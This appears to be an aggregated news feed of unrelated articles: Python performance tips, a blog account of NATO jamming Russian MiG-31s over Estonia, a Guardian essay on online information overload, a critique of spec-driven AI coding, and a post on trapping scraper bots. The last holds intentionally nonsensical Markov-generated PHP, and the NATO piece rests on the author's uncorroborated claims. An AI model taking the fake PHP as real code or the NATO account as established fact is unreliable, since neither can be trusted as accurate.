When working with sorted lists, using linear search or manual insertion logic can be inefficient – especially as the list grows. Python’s bisect module provides fast, efficient tools for maintaining sorted order using binary search.

With functions like bisect_left() , bisect_right() , and insort() , you can perform insertions and searches in O(log n) time, as opposed to the O(n) complexity of a simple scan. This is particularly useful in scenarios like maintaining leaderboards, event timelines, or implementing efficient range queries.

By using bisect , you avoid re-sorting after every change and gain a significant performance boost when working with dynamic, sorted data. It’s a lightweight and powerful tool that brings algorithmic efficiency to common list operations.

import bisect
numbers = sorted(list(range(0, 1000000, 2)))
start = time.time()
bisect.insort(numbers, 75432)
print(f"Bisect: {time.time() - start:.4f}s")

start = time.time()
for i, num in enumerate(numbers):
    if num > 75432:
        numbers.insert(i, 75432)
        break
print(f"Loop: {time.time() - start:.4f}s")

Time measured:

  • bisect : ~0.0001s
  • Loop: ~0.0100s

Hack 10: Avoid repeated function calls in loops

Calling the same function multiple times inside a loop – especially if the function is expensive or produces the same result each time – can lead to unnecessary overhead. Even relatively fast functions can accumulate significant cost when called repeatedly in large loops.

To optimize, compute the result once outside the loop and store it in a local variable. This reduces function call overhead and improves runtime efficiency, particularly in performance-critical sections of code.

This technique is simple but effective. It not only speeds up execution but also enhances code clarity by signaling that the value is constant within the loop’s context. Caching function results is one of the easiest ways to eliminate redundant computation and make your code more efficient.

def expensive_operation():
    time.sleep(0.001)
    return 42
start = time.time()
cached_value = expensive_operation()
result = 0
for i in range(1000):
    result += cached_value
print(f"Cached: {time.time() - start:.4f}s")

start = time.time()
result = 0
for i in range(1000):
    result += expensive_operation()
print(f"Repeated: {time.time() - start:.4f}s")

Time measured:

  • Cached: ~0.0010s
  • Repeated: ~1.0000s

In summary

From leveraging the inherent efficiency of Python’s built-in functions and high-performance libraries such as NumPy to employing memory-conscious techniques with __slots__ and generators, these fifteen Python performance strategies provide a comprehensive set of tools for enhancing execution speed.

The methods explored include optimizing iterative processes with comprehensions, utilizing sets for rapid membership checks, avoiding unnecessary data copies and exception handling overhead, and applying bitwise operations as arithmetic shortcuts.

Specialized modules such as itertools , bisect , and collections further streamline complex tasks, while adherence to best practices – such as minimizing the use of global variables, pre-allocating memory, and implementing caching – ensures lean, efficient code execution. Empirical benchmarks demonstrate that even minor adjustments can yield significant time savings in large-scale operations, reinforcing the principle that effective optimization does not necessitate a complete code rewrite.

Whether refining a standalone script or scaling a production-level application, these techniques, when applied judiciously, can significantly enhance performance while conserving system resources. Ultimately, the most effective optimizations strike a balance between speed and clarity.

About the author

Dido Grigorov

Dido Grigorov

Dido is a seasoned Deep Learning Engineer and Python programmer with an impressive 17 years of experience in the field. He is currently pursuing advanced studies at the prestigious Stanford University, where he is enrolled in a cutting-edge AI program, led by renowned experts such as Andrew Ng, Christopher Manning, Fei-Fei Li and Chelsea Finn, providing Dido with unparalleled insights and mentorship.

Dido’s passion for Artificial Intelligence is evident in his dedication to both work and experimentation. Over the years, he has developed a deep expertise in designing, implementing, and optimizing machine learning models. His proficiency in Python has enabled him to tackle complex problems and contribute to innovative AI solutions across various domains.

Subscribe to PyCharm Blog updates

image description

Discover more

NATO Ended Russia's Estonian Air Incursions

Hacker News
themilitaryanalyst.com
2025-11-15 09:14:34
Comments...
Original Article

On the 19th September 2025 between 0958 and 1011hrs Russia carried out another, in a series of air incursions into Estonian airspace. They were technically minor infractions but the last one lasted almost 12 minutes, and in the context of tensions with NATO – largely created by Russia itself, it was just another dangerous move in the never ending game of Baltic chess.

Prior air incursions

This is why another similar move hasn’t happened, and why Russia will think twice before it does so again.

For decades the process of a NATO air interception has followed the usual procedure. In my lifetime I’ve witnessed or been made aware of hundreds, and even flown on one in the rear seat of a Tornado. It’s a thrilling experience, pulling up next to a Tu-22M (NATO: Tu-26 Backfire) in the south Norwegian Sea.

Ground or air based radars see the enemy coming, aircraft are scrambled and certainly in the Cold War era and until recently, the aircraft doing the intercepting would have been pinging their radars looking for the target. The NATO aircraft would arrive, escort the Russians out of their airspace or just sit next to them if they were in international space. The point was always to make it absolutely clear an interception would always happen. We would never back down from them and they always knew we would come.

At the same time the Russians would test the time to intercept and note which units had been sent to do the intercepting. It was how the game has always been played for the best part of 60 years.

Previous Estonia incursions had not been deterred and NATO command was well aware that the Russians were not convinced by playing the game the old fashioned way. It was not stopping them crossing into Estonian air space and they had the advantage on their side of a massive area of air space from which the could change direction at any time, conduct an incursion and leave – most likely before NATO aircraft could actually get to them. The Russians were using every opportunity to press home their local superiority and make sure NATO knew it.

Their preferred aircraft for these operations is not so much a fighter in the classic sense, but a long range interceptor, The Mig-31 Foxhound. It’s incredibly fast in a straight line at Mach 2.8 – leaving most western aircraft standing – has a combat radius of around 1,900 miles (3,060Km) and can be in and out of an incursion zone in a couple of minutes, at heights as far up as 82,000ft (25,000m).

The Mig-31 Foxhound Interceptor

NATO knew this. It also knew that the Russian command system is nowhere near as integrated as NATO’s and Mig-31 pilots refer to the Ground Assisted Control for instructions on almost everything. It was clear these incursions were ordered and deliberate. The time had come to change the rules of the game and show the Russians that whatever they thought those rules were, NATO had changed them. Russia was about to find out once and for all how dramatically and effectively things have moved on.

NATO had made a military and political choice to reveal to the Russians they were not messing around any more, putting up with these incursions was not going to be sustainable, and it was time to demonstrate Western superiority. Once you read what happened and remember the calls for shooting down any future incursion that followed, you’ll understand why the Russians haven’t done it again. This is remarkable tale of NATO pushing back and Russia actually getting the message.

Italian Air Force F-35’s played a key but near silent role, unseen, unhindered, demonstrating true air superiority.

The Mig-31 uses a very powerful phased array radar, designed to look ahead for air targets, called the SBI-16 Zaslon. Later upgrades have referred to variants like Zaslon-M, enhancing detection ranges and track-while-scan functionality. These radars enable simultaneous tracking of multiple targets and coordination with other aircraft and ground systems. However they are unable to ‘look down’ and operate only in the air to air domain. Coupled to long range air to air missiles, the Foxhound represents the ideal long range interceptor platform – provided it can see the target of course.

The whole concept of the long range interceptor is a little bit 1950’s, derived from the days of the dominant strategic bomber as a nuclear weapons delivery platform. Long range interceptors – the most famous being the Su-15 Flagon which shot down Korean Air 007 on September 1st 1983, thinking it was a US RC-135 spy plane in Russian air space, are a Russian ‘thing’. The follow on Mig-25 and now the Mig-31 are still intended to fulfill a similar role, though against what is hard to ascertain in the 21st Century.

The Mig-31 may be capable, but it’s really from a different era, where straight line speed has little meaning and despite its powerful radar, it’s not really suited to modern air combat. Yet the Russians see it as perfectly suited to simply rattling NATO’s cage, and if that’s all it does, they’re happy.

In any event the Mig-31 Foxhound is an ideal way to get in and get out in a deliberate incursion role like this.

NATO was monitoring the Baltic States air space from ground radars and from a Gielenkirchen based AWACS several hundred kilometers back near the German/Polish border. It identified the three Russian Mig-31’s well before they entered Estonian airspace.

As soon as the AWACS spotted the aircraft they informed NATO at the Combined Air Operations Centre in Udem, Germany right on the border with the Netherlands, which ordered two Italian F-35’s to take off from their Estonian air base at Amari on the coast. They took off under compete operational silence. This was done through NATO secure encryption and the F-35’s were operating without radars active and without alerting the Russians. The F-35’s however could see exactly where the Russians were and what they were doing via NATO Datalink-16 shared from the AWACS. No need to use their own radars, which made them effectively invisible to the Zaslon radar on the Foxhounds.

Meanwhile a pair of Swedish Gripens on patrol over the Baltic, equipped with Meteor missiles are boxing in the Russians – and again, they have no idea. The Gripens know what the F-35’s know and vice versa, all shared with the AWACS and NATO command.

Gripen E with Meteor and Araxis played a key role

Meanwhile the Foxhounds are doing what they always do, testing response times, mapping radar coverage gaps, listening for comms and generally looking for weakness in the local air defence system. Yet that’s just part of what they aim for, because the real point is to get in and get out and make it so normal an event that it’s simply not worth intercepting every single time. It’s about enforcing their right to roam where they want and NATO getting fed up with stopping them. They have never understood that we don’t tire and we always are waiting for them.

This time there would be no polite escort, no gentlemanly wave from the cockpit. NATO was about to demonstrate overwhelming capability without firing a shot.

Italian Air Force F-35’s of the NATO Air Policing Mission were critical components in the operation. Their stealth was crucial. A silent but vital victory.

The Russians were also being watched by a US RQ-4 Globalhawk, over the Baltic, and that was backed up further by NATO signals intelligence supplied by a Ground Surveillance Satellite. it was the satellite that first knew the Russians were on the move.

The incursion was a favorite spot for the Russians, at Vaindloo island, just 28km from Russian air space. The Russians were bemused, no NATO aircraft appeared.

Meanwhile the F-35’s are using their AN/APG-81 Radars in passive mode, watching the Russians and relaying high band data to NATO and the Gripens. Everything the Russians do is being recorded and every transmission and signature unique to each aircraft logged. This data is permanently available to NATO for future use.

The Russians don’t know what’s about to hit them. Once the above data is known, the electronic warfare systems on the NATO aircraft know what to jam, when to jam it and how to maintain that jamming until they have completed their mission.

NATO AWACS flying out of Gielienkirchen – still doing their job guarding NATO skies.

Meanwhile the Gripens are closing but not using active radar, reliant on the data provided by NATO from all of its sources, primarily though the F-35’s and AWACS. Gripen is fitted with a Leonardo Skyward-G IRS, and Saab’s Arexis EW suite. The IRS detects and Arexis can deliver the response – even more of a comprehensive response when it knows exactly what its up against, using data from the F-35’s and their own passive sensors.

If this was a hostile scenario the Swedes could have used their 200km range ramjet powered Meteor air to air missiles which the Russians wouldn’t even have known were coming. The missile is designed to gain a lock on the target without a radar spike to identify it as a threat to the Russian aircraft. Combined with what was about to happen it demonstrates to the Russians a staggering level of advancement they have never before encountered. Once they got back to their base and were debriefed they will have known the immense danger they were potentially in if this had been a combat scenario.

Now it is true that NATO policy on interception policing requires physical eyeballing of the hostiles, so to let that happen with maximum impact, the F-35’s had to get close enough to see the Foxhounds. The Gripens unleashed their EW using radio digital memory jamming, creating false targets and rendering the Zaslon-M full of rubbish data. The Russians cockpits would have lit up like a Christmas tree, making no sense whatever of the information the Zaslon was providing. The Arexis cut off the radio between the aircraft and their ground base. The Foxhounds were in effect being rendered useless. They could see nothing and communicate with nobody.

The F-35’s closed from behind – unseen – and identified the aircraft using their optical scanner before pulling away. The Gripens commander then used the emergency radio frequency to tell the Russians, “You are under our control. Return to Russian air space immediately”.

At first confused the Russian pilots turned one after another and departed Estonian air space, back into international space and continued their journey to Kaliningrad. Who would like to have been in the briefing room after that escapade?

At no point did the Russians see a NATO aircraft. They were made absolutely aware that none of their missile and radar systems were operating normally and they were powerless to request orders from their command. Yet clearly all three pilots knew they’d been completely out matched and effectively crippled by the NATO response. And the Russian air command knew it too. They were utterly outclassed, boxed in to a kill zone from which there was no getting away, and they couldn’t even see the aircraft responsible on radar let alone visually.

NATO demonstrated complete command of the air and a transformed digital data backbone working on a networked system utilizing multiple assets. The demonstration was so complete that the Russians got the message, especially when it was combined with NATO making it quite clear shooting down Russian aircraft wasn’t just a statement of intent if they did it again, it was backed up with a clear demonstration it could be done. It cannot be a coincidence it hasn’t happened since.

I’m going to be honest and say I was thrilled when I was shown how this was done, genuinely excited at how things have progressed and at the same time how little credit NATO and its organizations and members get for having quietly kept working towards ensuring the peace, while staying on top of the future of air combat.

I was equally moved by the fact that we don’t see what happens behind the scenes often enough. It was made public that the Russians had been told informally that threats of a shoot down scenario if they carried on with these provocations, are now very real and not just the words of an idle threat. It was backed up with the very real message NATO could achieve this and they would barely even know about it. All Russia has to do is ask its Foxhound pilots.

Russia understands only strength. NATO demonstrated it has the will and the capability. Quad erat demonstrandum Valdimir.

The Analyst

militaryanalyst.bsky.social

Don’t argue with strangers… and 11 more rules to survive the information crisis

Guardian
www.theguardian.com
2025-11-15 09:00:05
Feeling overwhelmed by divisive opinions, endless rows and unreliable facts? Here’s how to weather the data storm We all live in history. A lot of the problems that face us, and the opportunities that present themselves, are defined not by our own choices or even the specific place or government we’...
Original Article

W e all live in history. A lot of the problems that face us, and the opportunities that present themselves, are defined not by our own choices or even the specific place or government we’re living under, but by the particular epoch of human events that our lives happen to coincide with.

The Industrial Revolution, for example, presented opportunities for certain kinds of business success – it made some people very rich while others were exploited. If you’d known that was the name of your era, it would have given you a clue about what kinds of events to prepare for. So I’m suggesting a name for the era we’re living through: the Information Crisis.

It’s not a single moment; it’s an epoch – we’re in the middle of it already and it is going to continue for the rest of our lives. And I’d argue that this is the third great information crisis human beings have gone through: following the invention of writing and the Gutenberg printing press, we are now witnessing a crisis caused by digital communications technology. These prolonged crises aren’t just neutral technological improvements; they change us psychologically and socially in profound ways that cannot be reversed.

Naomi Alderman
Naomi Alderman. Photograph: Phil Fisk/The Guardian

What we can see from the last two information crises is that they involve enormous leaps forward in knowledge and understanding, but also a period of intense instability. Following the invention of writing, the world was filled with new, beautiful ideas and new moralities. And there were also new ways to misunderstand each other: the possibility of misreading someone entered the world, as did the possibility of warfare motivated by different interpretations of texts. After the invention of the printing press came the Enlightenment, an explosion of new scientific knowledge and discovery. But before that period, Europe had plunged into the Reformation, which led to the destruction of statues and other artworks and many institutions that had been working at least adequately until then. And, to get to the heart of the matter, the Reformation in Europe meant a lot of people got burned at the stake, or killed in other terrible ways.

I’m not just talking about literal “burning at the stake”, I’m using it as a shorthand for the things people end up doing in the throes of a doctrinal dispute that are completely against the values they would otherwise claim to hold. They are things that involve turning a living, breathing person into a symbol, something that can be treated with extreme cruelty to make a point. When I talk about “burning at the stake” I don’t mean criticising someone’s views in mature debate or protesting against government policies. I mean the things that demean you as a human being if you do them to others. I mean the point when the desire to just win an argument turns you into someone who goes against all your other values. There is never a good enough reason to burn someone at the stake.

I think the following is incontestable: the only way to get rid of all opinions that are different from yours is by carrying out unthinkable human rights atrocities. (And this doesn’t actually work: there are still, in fact, both Catholics and Protestants.)

We can already see how this type of thing becomes more common during an information crisis because we’re now in another one. We’re overloaded and overwhelmed by information. We don’t have the social and informational structures in place yet to manage it. My suggestion is that this enormous information wave makes us anxious and angry.

How? All this information introduces us to all the things we don’t know, all the ways in which we’re not experts. We might end up expressing an idea online that we’ve heard many times in our social circle only to be jumped on by 50 people who know more and tell us that our ideas are stupid, old-fashioned and even prejudiced. If this ever happens to you, it might make you feel profoundly unsettled, frightened, out of touch. That might be a good thing. It’s also an emotionally destabilising thing. It works the other way around, too. When we can see everyone else’s opinions, it turns out that someone we really liked may hold an idea that we find stupid, old-fashioned or even prejudiced. It’s the “I used to like Uncle Bob until I saw his posts on Facebook” syndrome. We’re left wondering who we can trust and whether we’re actually surrounded by upsetting idiots. All this can leave us feeling isolated and misunderstood, unsupported, frightened, worried and angry.

Well, that’s probably very much how it felt in Reformation Europe to find out that your next-door neighbour had a very different idea from you about whether the bread and wine of the sacrament were really the body and blood of Christ.

Which is to say: sadly we can expect this to get worse before it gets better. But there are tools and techniques we can use in the current information crisis. There are ways we can be better equipped to deal with the era we find ourselves in.

Phone protected in bell jar on a pedestal
Illustration: Tim Alexander/The Guardian

1 Find a fact-checker you trust

Just as after the print revolution in early modern Europe, it is now massively easier to access scientific information. In a few seconds I can find a video clearly explaining particle physics, chemical bonds or how vaccines work. And at the same time, it is also extremely easy to find very plausible-looking information that is completely false about how vaccines are actually terrible and suggesting solutions that I really don’t even want to write down here.

But unlike people living through the print revolution, we have sophisticated and trusted information-dispersal networks that are still fairly robust. The BBC has a good fact-checking service. Snopes and PolitiFact are good. There are others, and it’s worth getting familiar with them. Fact-checking is a specialised skill, though, and it is becoming more challenging as the fakes get ever more convincing.

Goodness knows, I have sometimes shared information on social media that turned out to be false. It’s very embarrassing, and I feel the urge every time to double down on my mistake and claim that there is some way in which it sort of is true even though it’s definitely not.

These days, I try to notice how something I want to share on social media is making me feel. If I have a very strong feeling of any type, I use that as a cue to slow down and check my facts. It could be a strong gleeful feeling of: “Oh, this is rich.” Like a tweet I saw recently claiming to be by Donald Trump from a few years ago, saying that if the Dow drops 1,000 points in a day, the president should be impeached. “Oh, this is rich,” I thought to myself. Of course, it’s fake. Or if I feel “Oh God, that’s dreadful, what those people are doing”, that’s also a good sign it might be fake. If it feels too perfectly tailored to me, if it presses my buttons, if it precisely tickles me where I like to be tickled or hurts me where I am vulnerable to being hurt, that’s a sign to check the facts.

3 Resist the urge to shame others online

We’re going to need some new social norms to survive this crisis. Getting into the habit of pausing online whenever you feel a strong emotion and a desire to repost is one new norm to learn ourselves, and teach to children. Another is how to behave when you see someone sharing something you believe to be false. Don’t embarrass them in public. It’s going to happen to you one day, too. Think about how you’d like that person to approach you. A private note, where you’re on their side. It is extremely easy to alienate people via text communication because of all the oral-culture things that are missing from text. “Argh, that made me laugh so much but I don’t think it’s true?” Probably one of the ways that we get through this is by trying not to pointlessly alienate the other humans.

4 Give institutions the benefit of the doubt

Institutions that are sources of basically truthful information are going to be particularly vulnerable when, inevitably, they do get something wrong. There is no such thing as an information system that never gets anything wrong. What we’re looking for is a rapid acknowledgment of the problem, lack of defensiveness, curiosity about how it happened, a focus on systems and not individuals as the way to make sure it doesn’t happen like that again. That’s the ideal.

Even with the ideal system, in an information crisis there will be plenty of people willing to tear down a good-faith truth-seeking organisation over errors, who will use an error or a bad member of that organisation as evidence that nothing from that source can be trusted.

So, which institutions are we being tempted to condemn root-and-branch because of some mistakes and abuses? What large, trying-to-be-helpful-but-sometimes-failing associations would various rulers like to break up and destroy because they represent alternative sources of authority to their own narrative, and also there’s money to be made?

Man turning away from bad content on phone
Illustration: Tim Alexander/The Guardian

5 Try not to ‘hate read’

The internet allows every person to access precisely the opinions that most please or enrage them – being enraged is a particular form of being pleased, actually. Finding things on the internet to “hate read” is a way of feeling great about yourself, because you’re not as stupid and wrong as those other people. The internet allows and encourages us to either find opinions that we wildly, enthusiastically agree with or conversely the most ridiculous and objectionable and stupid forms of the views on the other side of any issue.

In every information crisis, there is a tendency to cut ourselves off and look not at the community around us but at the particular information that makes us feel comfortable and right. What we lose via giving in to that tendency is shared reality. That is, a reality we all consent to. Once you’ve lost that, it’s easy to dehumanise others, to start to believe that people who disagree with you aren’t really people at all.

6 Recognise humanity

This is about not treating people as symbols. About the sense that we are not surrounded by cretinous, vicious imbeciles but mostly by careful, thoughtful people who may disagree with us but usually have good reasons for doing so and with whom we could have a reasonably civilised conversation and find many points on which we do agree. I know that saying this already makes me sound like a utopian. I know that it feels as if we probably are surrounded by cretinous, vicious imbeciles a lot of the time. That’s because we’re already right in the middle of an information crisis.

Protester with ‘no smartphones’ sign
Illustration: Tim Alexander/The Guardian

7 Ignore the opinions of others

If you agree that at least some of the reason that conversation and debate feel so fraught right now is because of our new communication technologies, maybe that helps with taking a step back, not immediately shouting angrily at someone who disagrees with you, online or in real life. Having thought about this a lot, I increasingly take everyone’s emotions seriously, and treat very few people’s opinions seriously. Everyone has an opinion. Unless the person is an expert it’s a mistake to treat their opinion as very important.

8 Use your smartphone judiciously

A smartphone designed by people who care about your wellbeing wouldn’t be asking you to log your mental health with it – don’t do that, really really don’t do that – or even give little passive-aggressive screentime notifications. A smartphone designed by people who care about your wellbeing would prompt you to choose apps to disable after a certain point in the evening, would ask to be turned off for a certain number of hours in the day. It would presume that in general your life is better if you are not spending all day looking at a device, and try to facilitate that. As smartphones don’t do that, we need to treat them with caution. Or even get rid of them; a lot of people are doing that.

Likewise, in an ideal world, social media apps would make it extremely easy not to see content that you didn’t want to see. It would be simple to “whitelist” accounts, topics, video channels, types of content. That is to say, if social media apps were designed with public service in mind, it would be straightforward to tell them, for example, “I only want to see my friends’ pictures of their family, their pets, their recipes, their updates about their career” or whatever it is that you want to see, without having to confront their political opinions. We are living through a time when we are going to be winding each other up a lot. It is all right to want to preserve relationships with family members and friends by only seeing their politics when you choose to engage with it.

And see people in person. If we rely on technology for human connection over in-person interactions, it will leave us feeling more lonely. If you’re feeling more isolated than you were just a few years ago, technology might be the reason. Start by understanding that loneliness isn’t just something that’s happening to you because you’ve done something wrong; it’s a feature of the historical era we’re living through. Make an arrangement to see someone, in person. Your friends would like to hear from you.

Child with phone, over stopwatch background
Illustration: Tim Alexander/The Guardian

10 Don’t cut children off altogether

There are some online services that allow whitelisting for the children’s version but not for the grown-up one. This in itself is terrible for adults and for children. It creates a cliff-edge where either you’re – let’s say – under 13 and you can only see a few child-focused things on the internet, or suddenly you’re 13 and you get the full firehose of internet horror straight in the face. It means childhood is more denuded of opportunities for entertainment and culture – if everything is accessed via a parent’s smartphone then how do children play music for themselves, or browse radio stations? And it means that there are no helpful on-ramps where parents can slowly decide over the years which more adult-oriented content they can tell their child is ready for. “Protecting the children” is a terrible framing for this. We all need technology that at least allows us the option to take care of ourselves.

11 Campaign for better laws

Although these problems would happen to some extent without technology companies, it is clear that many tech companies now are exacerbating them. We need laws that put us in charge of our own smartphones and our own social media, that mean that we can say exactly what we want to see on them and when. We deserve smartphones and social media that protect our wellbeing and that of our children – countries need to work together on new laws to force the tech companies to do this.

12 Avoid pointless arguments

These days, on Bluesky, I have the words “not getting into pointless arguments on the internet is an act of revolution” in my profile. It keeps me honest. Sometimes I feel tempted to get into a pointless argument. Sometimes someone else has to say, “I thought you didn’t believe in doing this”. And I stand back and go, “Oh yes, arse, I haven’t lived according to my own values here”.

Here’s a rule I have developed for myself: never talk about a culture-war topic with anyone who only wants to talk to you about that topic. These conversations can only be helpful if they happen as part of a relationship. If you’re going in cold on a very hard topic, you will not be able to experience each other as people, only as opinions or symbols.

Ultimately, don’t let the worst “the other side” has done become the new low bar for your own behaviour. Don’t treat people as symbols. Consider the possibility that where reasonable people disagree there may be some useful truth on both sides, even if it’s only the truth of – as we say these days – “lived experience”. Don’t try to get anyone fired today. Don’t insult or berate someone today. Don’t trawl through someone’s social media going back decades to dredge up the worst thing they’ve ever said, today. Don’t, fundamentally, burn anyone at the stake today.

Spec-Driven Development: The Waterfall Strikes Back

Hacker News
marmelab.com
2025-11-15 07:48:23
Comments...
Original Article

Spec-Driven Development (SDD) revives the old idea of heavy documentation before coding — an echo of the Waterfall era. While it promises structure for AI-driven programming, it risks burying agility under layers of Markdown. This post explores why a more iterative, natural-language approach may better fit modern development.

The Rise of Specification

Coding assistants are intimidating: instead of an IDE full of familiar menus and buttons, developers are left with a simple chat input. How can we ensure that the code is correct with so little guidance?

Before and after

To help people write good software with coding assistants, the open-source community designed a clever way to guide a coding agent. Based on an initial prompt and a few instructions, an LLM generates product specifications, an implementation plan, and a detailed list of tasks. Each document depends on the previous one, and users can edit the documents to refine the spec.

Spec-Driven-Development

Eventually, these documents are handed over to a coding agent (Claude Code, Cursor, Copilot, you name it). The agent, now properly guided, should write solid code that satisfies the business requirements.

This approach is called Spec-Driven Development (SDD), and several toolkits can get you started. To name a few:

If you want a comparison of these tools, I recommend the excellent article Understanding Spec-Driven-Development: Kiro, spec-kit, and Tessl by Birgitta Böckeler.

The Markdown Awakens

How does a spec look? It’s essentially a bunch of Markdown files. Here’s an example using GitHub’s spec-kit, where a developer wanted to display the current date on a time-tracking app, resulting in 8 files and 1,300 lines of text :

Spec-Kit generated spec for Frequentito

Here’s another example using Kiro for a small feature (adding a “referred by” field to contacts in Atomic CRM ):

Requirements.md - Design.md - Tasks.md

At first glance, these documents look relevant. But the devil is in the details. Once you start using SDD, a few shortcomings become clear:

  • Context Blindness : Like coding agents, SDD agents discover context via text search and file navigation. They often miss existing functions that need updates, so reviews by functional and technical experts are still required.
  • Markdown Madness : SDD produces too much text, especially in the design phase. Developers spend most of their time reading long Markdown files, hunting for basic mistakes hidden in overly verbose, expert-sounding prose. It’s exhausting.
  • Systematic Bureaucracy : The three-step design process is excessive for most cases. Specs contain many repetitions, imaginary corner cases, and overkill refinements. It feels like they were written by a picky clerk.
  • Faux Agile : SDD toolkits generate what they call “User Stories,” but they often misuse the term (e.g. “As a system administrator, I want the referred by relationship to be stored in the database” is not a user story). It doesn’t cause bugs but it’s distracting.
  • Double Code Review : The technical specification already contains code. Developers must review this code before running it, and since there will still be bugs, they’ll need to review the final implementation too. As a result, review time doubles.
  • False Sense of Security : The SDD methodology is meant to keep the coding agent on track, but in practice, agents don’t always follow the spec. In the example above, the agent marked the “verify implementation” task as done without writing a single unit test—it wrote manual testing instructions instead.
  • Diminishing Returns : SDD shines when starting a new project from scratch, but as the application grows, the specs miss the point more often and slow development. For large existing codebases, SDD is mostly unusable.

Most coding agents already have a plan mode and a task list . In most cases, SDD adds little benefit. Sometimes, it even increases the cost of feature development.

To be fair, SDD helps agents stay on task and occasionally spots corner cases developers might miss. But the trade-off (spending 80% of your time reading instead of thinking) is, in my opinion, not worth it.

Revenge of the Project Manager

Maybe SDD doesn’t help much today because the toolkits are still young and the document prompts need refinement. If that’s the case, we just need to wait a few months until they improve.

But my personal opinion is that SDD is a step in the wrong direction . It tries to solve a faulty challenge:

“How do we remove developers from software development?”

It does so by replacing developers with coding agents and guarding those agents with meticulous planning.

In that sense, SDD reminds me of the Waterfall model , which required massive documentation before coding so that developers could simply translate specifications into code.

Waterfall model

But developers haven’t been mere executors for a long time, and Big Design Up Front has proven to fail most of the time because it piles up hypotheses. Software development is fundamentally a non-deterministic process , so planning doesn’t eliminate uncertainty (see the classic No Silver Bullet paper).

Also, who is SDD really for? You must be a business analyst to catch errors during the requirements phase, and a developer to catch errors during design. As such, it doesn’t solve the problem it claims to address (removing developers), and it can only be used by the rare individuals who master both trades. SDD repeats the same mistake as No Code tools, which promise a “no developer” experience but actually require developers to use them.

A New Hope

Agile methodologies solved the problem of non-deterministic development by trading predictability for adaptability. I believe they show us a path where coding agents can help us build reliable software, without drowning in Markdown.

Give a coding agent a simple enough problem, and it won’t go off the rails. Instead of translating complex requirements into complex design documents, we should split complex requirements into multiple simple ones .

I’ve successfully used coding agents to build fairly complex software without ever looking at the code, by following a simple approach inspired by the Lean Startup methodology :

  1. Identify the next most risky assumption in the product.
  2. Design the simplest experiment to test it.
  3. Develop that experiment. If it fails, go back to #2. Otherwise, repeat starting from #1.

Here’s an example: this 3D sculpting tool with adaptive mesh, which I built with Claude Code in about 10 hours:

I didn’t write any spec . I just added small features one by one, correcting the software when the agent misunderstood me or when my own idea didn’t work well. You can see my instructions in the coding session logs : they’re often short and vague, and sometimes lead to dead ends, but that’s fine. When implementing simple ideas is cheap, building in small increments is the fastest way to converge toward a good product.

Agile methodologies freed us from the bureaucracy of waterfall. They showed that close collaboration between product managers and developers eliminates the need for design documents. Coding agents supercharge Agile , because we can literally write the product backlog and see it being built in real time—no mockups needed!

This approach has one drawback compared to Spec-Driven Development: it doesn’t have a name. “Vibe coding” sounds dismissive, so let’s call it Natural Language Development .

I do have one frustration, though: coding agents use text, not visuals. Sometimes I want to point to a specific zone, but browser automation tools aren’t good enough (I’m looking at you, Playwright MCP Server ). So if we need new tools to make coding agents more powerful, I think the focus should be on richer visual interactions.

Conclusion

Agile methodologies killed the specification document long ago. Do we really need to bring it back from the dead?

Spec-Driven Development seems born from the minds of CS graduates who know their project management textbooks by heart and dream of removing developers from the loop. I think it’s a missed opportunity to use coding agents to empower a new breed of developers, those who use natural language and build software iteratively.

Let me end with an analogy: coding agents are like the invention of the combustion engine. Spec-Driven Development keeps them confined to locomotives, when we should be building cars, planes, and everything in between. Oh, and just like combustion engines, we should use coding agents sparingly if we care about the environment.

Messing with Scraper Bots

Hacker News
herman.bearblog.dev
2025-11-15 07:38:18
Comments...
Original Article

As outlined in my previous two posts : scrapers are, inadvertently, DDoSing public websites. I've received a number of emails from people running small web services and blogs seeking advice on how to protect themselves.

This post isn't about that. This post is about fighting back.

When I published my last post, there was an interesting write-up doing the rounds about a guy who set up a Markov chain babbler to feed the scrapers endless streams of generated data. The idea here is that these crawlers are voracious, and if given a constant supply of junk data, they will continue consuming it forever, while (hopefully) not abusing your actual web server.

This is a pretty neat idea, so I dove down the rabbit hole and learnt about Markov chains, and even picked up Rust in the process. I ended up building my own babbler that could be trained on any text data, and would generate realistic looking content based on that data.

Now, the AI scrapers are actually not the worst of the bots. The real enemy, at least to me, are the bots that scrape with malicious intent. I get hundreds of thousands of requests for things like .env , .aws , and all the different .php paths that could potentially signal a misconfigured Wordpress instance.

These people are the real baddies.

Generally I just block these requests with a 403 response. But since they want .php files, why don't I give them what they want?

I trained my Markov chain on a few hundred .php files, and set it to generate. The responses certainly look like php at a glance, but on closer inspection they're obviously fake. I set it up to run on an isolated project of mine, while incrementally increasing the size of the generated php files from 2kb to 10mb just to test the waters.

Here's a sample 1kb output:

<?php wp_list_bookmarks () directly, use the Settings API. Use this method directly. Instead, use `unzip_file() {
return substr($ delete, then click &#8220; %3 $ s object. ' ), ' $ image
*
*
*
* matches all IMG elements directly inside a settings error to the given context.
* @return array Updated sidebars widgets.
* @param string $ name = "rules" id = "wp-signup-generic-error" > ' . $errmsg_generic . ' </p> ';
	}
	/**
	 * Fires at the end of the new user account registration form.
	 *
	 * @since 3.0.0
	 *
	 * @param WP_Error $errors A WP_Error object containing ' user_name ' or ' user_email ' errors.
	 */
	do_action( ' signup_extra_fields ', $errors );
}

/**
 * Validates user sign-up name and email.
 *
 * @since MU (3.0.0)
 *
 * @return array Contains username, email, and error messages.
 *               See wpmu_validate_user_signup() for details.
 */
function validate_user_form() {
	return wpmu_validate_user_signup( $_POST[' user_name '], $_POST[' user_email '] );
}

/**
 * Shows a form for returning users to sign up for another site.
 *
 * @since MU (3.0.0)
 *
 * @param string          $blogname   The new site name
 * @param string          $blog_title The new site title.
 * @param WP_Error|string $errors     A WP_Error object containing existing errors. Defaults to empty string.
 */
function signup_another_blog( $blogname = ' ', $blog_title = ' ', $errors = ' ' ) {
	$current_user = wp_get_current_user();

	if ( ! is_wp_error( $errors ) ) {
		$errors = new WP_Error();
	}

	$signup_defaults = array(
		' blogname '   => $blogname,
		' blog_title ' => $blog_title,
		' errors '     => $errors,
	);
}

I had two goals here. The first was to waste as much of the bot's time and resources as possible, so the larger the file I could serve, the better. The second goal was to make it realistic enough that the actual human behind the scrape would take some time away from kicking puppies (or whatever they do for fun) to try figure out if there was an exploit to be had.

Unfortunately, an arms race of this kind is a battle of efficiency. If someone can scrape more efficiently than I can serve, then I lose. And while serving a 4kb bogus php file from the babbler was pretty efficient, as soon as I started serving 1mb files from my VPS the responses started hitting the hundreds of milliseconds and my server struggled under even moderate loads.

This led to another idea: What is the most efficient way to serve data? It's as a static site (or something similar).

